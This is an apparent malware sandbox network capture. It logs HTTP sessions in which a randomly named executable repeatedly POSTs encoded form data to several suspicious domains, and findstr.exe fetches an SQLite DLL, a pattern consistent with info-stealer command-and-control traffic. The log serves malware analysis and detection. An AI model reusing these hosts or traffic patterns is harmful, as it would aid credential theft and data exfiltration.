0 | 192.168.2.22 | 49167 | 3.33.130.190 | 80 | 1564 | C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe
Timestamp | Bytes transferred | Direction | Data
Oct 21, 2024 13:15:19.845560074 CEST | 479 | OUT | GET /7qh8/?o0I8bJWh=30gz3aeCGXts4Q76IE+H941JnGeso7u8ST9k2gxA0wQlWv8qAc7eS7l6bdvqrf9uLD1EZ4RKxD3BFAyB/gyNnMcHzfUP1SI6JZ3kLHzdYP32mYCFOTVusz8SPvQZ&IzCDX=JREpwHC8S HTTP/1.1
                                                                                                  Host: www.deikamalaharris.info
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
Oct 21, 2024 13:15:20.478369951 CEST | 404 | IN | HTTP/1.1 200 OK
                                                                                                  Server: openresty
                                                                                                  Date: Mon, 21 Oct 2024 11:15:20 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 264
                                                                                                  Connection: close
                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?o0I8bJWh=30gz3aeCGXts4Q76IE+H941JnGeso7u8ST9k2gxA0wQlWv8qAc7eS7l6bdvqrf9uLD1EZ4RKxD3BFAyB/gyNnMcHzfUP1SI6JZ3kLHzdYP32mYCFOTVusz8SPvQZ&IzCDX=JREpwHC8S"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.22 | 49168 | 45.33.6.223 | 80 | 728 | C:\Windows\SysWOW64\findstr.exe
Timestamp | Bytes transferred | Direction | Data
Oct 21, 2024 13:15:25.338615894 CEST | 242 | OUT | GET /2021/sqlite-dll-win32-x86-3340000.zip HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
                                                                                                  Host: www.sqlite.org
                                                                                                  Connection: Keep-Alive
                                                                                                  Cache-Control: no-cache
Oct 21, 2024 13:15:25.933815002 CEST | 312 | IN | HTTP/1.1 404 Not Found
                                                                                                  Connection: close
                                                                                                  Date: Mon, 21 Oct 2024 11:15:25 GMT
                                                                                                  Content-type: text/html; charset=utf-8
                                                                                                  Data Ascii: <html><head><title lineno="380">Not Found</title></head><body><h1>Document Not Found</h1>The document /2021/sqlite-dll-win32-x86-3340000.zip is not available on this server</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.22 | 49169 | 45.33.6.223 | 80 | 728 | C:\Windows\SysWOW64\findstr.exe
Timestamp | Bytes transferred | Direction | Data
Oct 21, 2024 13:15:27.195919991 CEST | 242 | OUT | GET /2017/sqlite-dll-win32-x86-3180000.zip HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
                                                                                                  Host: www.sqlite.org
                                                                                                  Connection: Keep-Alive
                                                                                                  Cache-Control: no-cache
Oct 21, 2024 13:15:27.800167084 CEST | 249 | IN | HTTP/1.1 200 OK
                                                                                                  Connection: keep-alive
                                                                                                  Date: Mon, 21 Oct 2024 11:15:27 GMT
                                                                                                  Last-Modified: Thu, 11 May 2017 18:51:23 GMT
                                                                                                  Cache-Control: max-age=120
                                                                                                  ETag: "m5914b2abs6c4dc"
                                                                                                  Content-type: application/zip; charset=utf-8
                                                                                                  Content-length: 443612


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.22 | 49170 | 185.174.173.22 | 80 | 1564 | C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe
Timestamp | Bytes transferred | Direction | Data
Oct 21, 2024 13:15:35.531753063 CEST | 2472 | OUT | POST /0804/ HTTP/1.1
                                                                                                  Host: www.rockbull.pro
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  Origin: http://www.rockbull.pro
                                                                                                  Content-Length: 2165
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Referer: http://www.rockbull.pro/0804/
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
Oct 21, 2024 13:15:36.656853914 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                  Connection: close
                                                                                                  x-powered-by: PHP/8.1.29
                                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                  cache-control: no-cache, must-revalidate, max-age=0
                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                  link: <https://rockbull.pro/wp-json/>; rel="https://api.w.org/"
                                                                                                  transfer-encoding: chunked
                                                                                                  content-encoding: gzip
                                                                                                  vary: Accept-Encoding
                                                                                                  date: Mon, 21 Oct 2024 11:15:36 GMT
                                                                                                  server: LiteSpeed
                                                                                                  Data Ascii: 81u]3us~Tn\]b=5;Ns(VsSu`6jmPRE/2Sn^Q@R;`[qn>AcOG xi[ du0F4bE()#hK(exPmQmoY6]@BiMSQ4CH
                                                                                                  Oct 21, 2024 13:15:36.667521954 CEST1236INData Raw: 11 07 f2 56 de f9 41 cf 70 00 f8 39 74 ef 97 e7 ba 9d 58 fa 4d 4e b2 e4 0e dc 12 5f 7e 80 13 0c 09 02 5d 2a 95 9b a6 4c 3b d7 84 fd bc ad 72 d3 65 7b 04 0f 87 5e af 04 91 c3 7c 8f 86 f6 1e cd a2 5e cf f7 30 4b 9d e9 b2 bd f3 ee cb f3 be 2d 25 d2
                                                                                                  Data Ascii: VAp9tXMN_~]*L;re{^|^0K-%nCB$ksfEn^4G$,]8\Bm@zsW|tB*!Il 6pN?p'j5]s:J911M@!.YNC.H
                                                                                                  Oct 21, 2024 13:15:36.667555094 CEST333INData Raw: 09 c4 47 58 c5 97 f0 f5 a9 24 c8 cf 94 44 a1 45 04 23 2b 28 39 e5 63 3e c6 c6 f2 a7 7c 2c fe 06 81 21 e1 8f f4 e8 4b 7c 39 17 7d 49 d9 58 14 3a e8 31 1f 41 27 61 44 39 34 08 ff 5e 1c 13 71 84 0d e3 cf f8 09 3f e3 8f b1 b7 50 ca 23 fe 18 c3 f8 1f
                                                                                                  Data Ascii: GX$DE#+(9c>|,!K|9}IX:1A'aD94^q?P#%)?D)Leq &W/DB?:D1?As1?!-(t\9iCqVqCQ%AB+_C^Im%4/[@-8-0064c


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  4 | 192.168.2.22 | 49171 | 185.174.173.22 | 80 | 1564 | C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Oct 21, 2024 13:15:38.073076963 CEST | 728 | OUT | POST /0804/ HTTP/1.1
                                                                                                  Host: www.rockbull.pro
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  Origin: http://www.rockbull.pro
                                                                                                  Content-Length: 205
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Referer: http://www.rockbull.pro/0804/
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
                                                                                                  Oct 21, 2024 13:15:39.177099943 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                  Connection: close
                                                                                                  x-powered-by: PHP/8.1.29
                                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                  cache-control: no-cache, must-revalidate, max-age=0
                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                  link: <https://rockbull.pro/wp-json/>; rel="https://api.w.org/"
                                                                                                  transfer-encoding: chunked
                                                                                                  content-encoding: gzip
                                                                                                  vary: Accept-Encoding
                                                                                                  date: Mon, 21 Oct 2024 11:15:39 GMT
                                                                                                  server: LiteSpeed


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  5 | 192.168.2.22 | 49172 | 185.174.173.22 | 80 | 1564 | C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Oct 21, 2024 13:15:40.614125967 CEST | 2472 | OUT | POST /0804/ HTTP/1.1
                                                                                                  Host: www.rockbull.pro
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  Origin: http://www.rockbull.pro
                                                                                                  Content-Length: 3629
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Referer: http://www.rockbull.pro/0804/
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
                                                                                                  Oct 21, 2024 13:15:41.661010027 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                  Connection: close
                                                                                                  x-powered-by: PHP/8.1.29
                                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                  cache-control: no-cache, must-revalidate, max-age=0
                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                  link: <https://rockbull.pro/wp-json/>; rel="https://api.w.org/"
                                                                                                  transfer-encoding: chunked
                                                                                                  content-encoding: gzip
                                                                                                  vary: Accept-Encoding
                                                                                                  date: Mon, 21 Oct 2024 11:15:41 GMT
                                                                                                  server: LiteSpeed


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  6 | 192.168.2.22 | 49173 | 185.174.173.22 | 80 | 1564 | C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Oct 21, 2024 13:15:43.153520107 CEST | 471 | OUT | GET /0804/?o0I8bJWh=7cQ5BE5RBCqgXF7xrBGoHohDXivjQLfe2KgDJ9LuiE6tpBU04a3sAbwq5Q7Yjj3JjwmtcjT9zhxyx84N9Ed0ZJTtf47MgLeYfgSXfectTV2gRR6PHDayMxuKrOIC&IzCDX=JREpwHC8S HTTP/1.1
                                                                                                  Host: www.rockbull.pro
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
                                                                                                  Oct 21, 2024 13:15:44.221621037 CEST | 500 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                  Connection: close
                                                                                                  x-powered-by: PHP/8.1.29
                                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                  cache-control: no-cache, must-revalidate, max-age=0
                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                  x-redirect-by: WordPress
                                                                                                  location: http://rockbull.pro/0804/?o0I8bJWh=7cQ5BE5RBCqgXF7xrBGoHohDXivjQLfe2KgDJ9LuiE6tpBU04a3sAbwq5Q7Yjj3JjwmtcjT9zhxyx84N9Ed0ZJTtf47MgLeYfgSXfectTV2gRR6PHDayMxuKrOIC&IzCDX=JREpwHC8S
                                                                                                  content-length: 0
                                                                                                  date: Mon, 21 Oct 2024 11:15:44 GMT
                                                                                                  server: LiteSpeed


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  7 | 192.168.2.22 | 49174 | 162.0.238.246 | 80 | 1564 | C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Oct 21, 2024 13:15:57.576988935 CEST | 2472 | OUT | POST /qd68/ HTTP/1.1
                                                                                                  Host: www.guldeu.xyz
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  Origin: http://www.guldeu.xyz
                                                                                                  Content-Length: 2165
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Referer: http://www.guldeu.xyz/qd68/
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
                                                                                                  Oct 21, 2024 13:15:57.582706928 CEST | 211 | OUT
                                                                                                  Oct 21, 2024 13:15:58.274892092 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                  Date: Mon, 21 Oct 2024 11:15:58 GMT
                                                                                                  Server: Apache
                                                                                                  Content-Length: 389
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html
                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  8 | 192.168.2.22 | 49175 | 162.0.238.246 | 80 | 1564 | C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Oct 21, 2024 13:16:00.138528109 CEST | 722 | OUT | POST /qd68/ HTTP/1.1
                                                                                                  Host: www.guldeu.xyz
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  Origin: http://www.guldeu.xyz
                                                                                                  Content-Length: 205
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Referer: http://www.guldeu.xyz/qd68/
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
                                                                                                  Oct 21, 2024 13:16:00.784848928 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                  Date: Mon, 21 Oct 2024 11:16:00 GMT
                                                                                                  Server: Apache
                                                                                                  Content-Length: 389
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html
                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  9 | 192.168.2.22 | 49176 | 162.0.238.246 | 80 | 1564 | C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Oct 21, 2024 13:16:02.673089027 CEST | 2472 | OUT | POST /qd68/ HTTP/1.1
                                                                                                  Host: www.guldeu.xyz
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  Origin: http://www.guldeu.xyz
                                                                                                  Content-Length: 3629
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Referer: http://www.guldeu.xyz/qd68/
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
                                                                                                  Oct 21, 2024 13:16:02.679402113 CEST | 1675 | OUT
                                                                                                  Oct 21, 2024 13:16:03.356532097 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                  Date: Mon, 21 Oct 2024 11:16:03 GMT
                                                                                                  Server: Apache
                                                                                                  Content-Length: 389
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html
                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  10 | 192.168.2.22 | 49177 | 162.0.238.246 | 80 | 1564 | C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Oct 21, 2024 13:16:06.459635019 CEST | 469 | OUT | GET /qd68/?o0I8bJWh=CMk3jWV7n2ud16JbSoz++xJaAy6tYmolV54GWsIImY9wr32Fxex2EERnMtANYc4DvCE1goWK72es3TtLYGEc3O5acPz147mgbIRl7hCPTM53qHiPKqWo/3UkWZwG&IzCDX=JREpwHC8S HTTP/1.1
                                                                                                  Host: www.guldeu.xyz
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
                                                                                                  Oct 21, 2024 13:16:07.149261951 CEST | 548 | IN | HTTP/1.1 404 Not Found
                                                                                                  Date: Mon, 21 Oct 2024 11:16:07 GMT
                                                                                                  Server: Apache
                                                                                                  Content-Length: 389
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  11 | 192.168.2.22 | 49178 | 15.197.148.33 | 80 | 1564 | C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Oct 21, 2024 13:16:12.237410069 CEST | 2472 | OUT | POST /rmem/ HTTP/1.1
                                                                                                  Host: www.asiapartnars.online
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  Origin: http://www.asiapartnars.online
                                                                                                  Content-Length: 2165
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Referer: http://www.asiapartnars.online/rmem/
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
                                                                                                  Oct 21, 2024 13:16:12.243108034 CEST | 238 | OUT


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  12 | 192.168.2.22 | 49179 | 15.197.148.33 | 80 | 1564 | C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Oct 21, 2024 13:16:14.785214901 CEST | 749 | OUT | POST /rmem/ HTTP/1.1
                                                                                                  Host: www.asiapartnars.online
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  Origin: http://www.asiapartnars.online
                                                                                                  Content-Length: 205
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Referer: http://www.asiapartnars.online/rmem/
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  13 | 192.168.2.22 | 49180 | 15.197.148.33 | 80 | 1564 | C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Oct 21, 2024 13:16:17.337447882 CEST | 2472 | OUT | POST /rmem/ HTTP/1.1
                                                                                                  Host: www.asiapartnars.online
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  Origin: http://www.asiapartnars.online
                                                                                                  Content-Length: 3629
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Referer: http://www.asiapartnars.online/rmem/
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
Data Ascii: o0I8bJWh= [TRUNCATED]
Oct 21, 2024 13:16:17.343046904 CEST | 1702 | OUT |
                                                                                                  Data Ascii: 4kFxE1cSoMh9H6kjzOgbygXy5pdLDOvEub81CtmF+q6B5OOLnjMx+VCbPUksdovha9vFpLoo7DJFtDE1o1DBrwcgaBzGIlV/SA4jxim4iDhkYs3aIO7EwNDLRjt0jlqi0spqmMPhutqNeCtxvxw40EaZIVeEIbPMVfZy3do7UrC5uUEwKIpHBc8rDgNbL2T3Q5x3SPfEkDU2D+P+QIurKrt4nwg2iEuQhPn/Q2SkoGV14w58YZQ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.22 | 49181 | 15.197.148.33 | 80 | 1564 | C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe
Timestamp | Bytes transferred | Direction | Data
Oct 21, 2024 13:16:19.880147934 CEST | 478 | OUT | GET /rmem/?o0I8bJWh=3mrg4OdF971xdpR9JqOipvCghMgMNm9pdqQXdKBxeUX/uUFHRyFRUgP+leOKIhGfNBOtjijimK07Q8HHjxhFaJ4HohJ/XqsVK02RuScXQBf97wXpW/1str23dyM9&IzCDX=JREpwHC8S HTTP/1.1
                                                                                                  Host: www.asiapartnars.online
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
Oct 21, 2024 13:16:20.496273041 CEST | 404 | IN | HTTP/1.1 200 OK
                                                                                                  Server: openresty
                                                                                                  Date: Mon, 21 Oct 2024 11:16:20 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 264
                                                                                                  Connection: close
                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?o0I8bJWh=3mrg4OdF971xdpR9JqOipvCghMgMNm9pdqQXdKBxeUX/uUFHRyFRUgP+leOKIhGfNBOtjijimK07Q8HHjxhFaJ4HohJ/XqsVK02RuScXQBf97wXpW/1str23dyM9&IzCDX=JREpwHC8S"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.22 | 49182 | 206.119.82.148 | 80 | 1564 | C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe
Timestamp | Bytes transferred | Direction | Data
Oct 21, 2024 13:16:25.525779009 CEST | 2472 | OUT | POST /v5ff/ HTTP/1.1
                                                                                                  Host: www.wdgb23.top
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  Origin: http://www.wdgb23.top
                                                                                                  Content-Length: 2165
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Referer: http://www.wdgb23.top/v5ff/
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
Data Ascii: o0I8bJWh= [TRUNCATED]
Oct 21, 2024 13:16:25.531397104 CEST | 211 | OUT |
                                                                                                  Data Ascii: 9ie/R8R42bOREz7ABAzLC8ZiOQlhF+IRIULneZEDch1IqTk6HSQHnlVak0hiMN6Li2ssaLrXBGrqP6avlS4nJIFu3G+HF3M5YiR7jge/NdnOJVqFbRwjnuTvjNnbQpcYl5d7W63voJRHzd7XwuKn8bWu0ExlWqcO5M9Y8nVrIIkEXt0GyIZWlV5IMJ1PFqNTgV+rA3wmTnSTQ2VsL5N
Oct 21, 2024 13:16:26.471731901 CEST | 302 | IN | HTTP/1.1 404 Not Found
                                                                                                  Server: nginx
                                                                                                  Date: Mon, 21 Oct 2024 11:16:26 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 138
                                                                                                  Connection: close
                                                                                                  ETag: "66ad66a8-8a"
                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.22 | 49183 | 206.119.82.148 | 80 | 1564 | C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe
Timestamp | Bytes transferred | Direction | Data
Oct 21, 2024 13:16:28.145299911 CEST | 722 | OUT | POST /v5ff/ HTTP/1.1
                                                                                                  Host: www.wdgb23.top
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  Origin: http://www.wdgb23.top
                                                                                                  Content-Length: 205
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Referer: http://www.wdgb23.top/v5ff/
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
                                                                                                  Data Ascii: o0I8bJWh=3IFEbfxcIU/Ynp5opqzqavyr+u7OIF88CkZ/ms55Dqa7jgIdakVhFPTqpUu1PmW7MYKjJTVCfMLavxVr/BnB1S5UoFfBhMxK2+2CoW7ILCXJvb8BE0aq0vzbY3u5TrAJIVv9H9upjWufrC3Wv4i7PxyuSxXIADByxtoN+8ctoEKjd+Eci5BtIiH3A9l0Ko+aLQ==
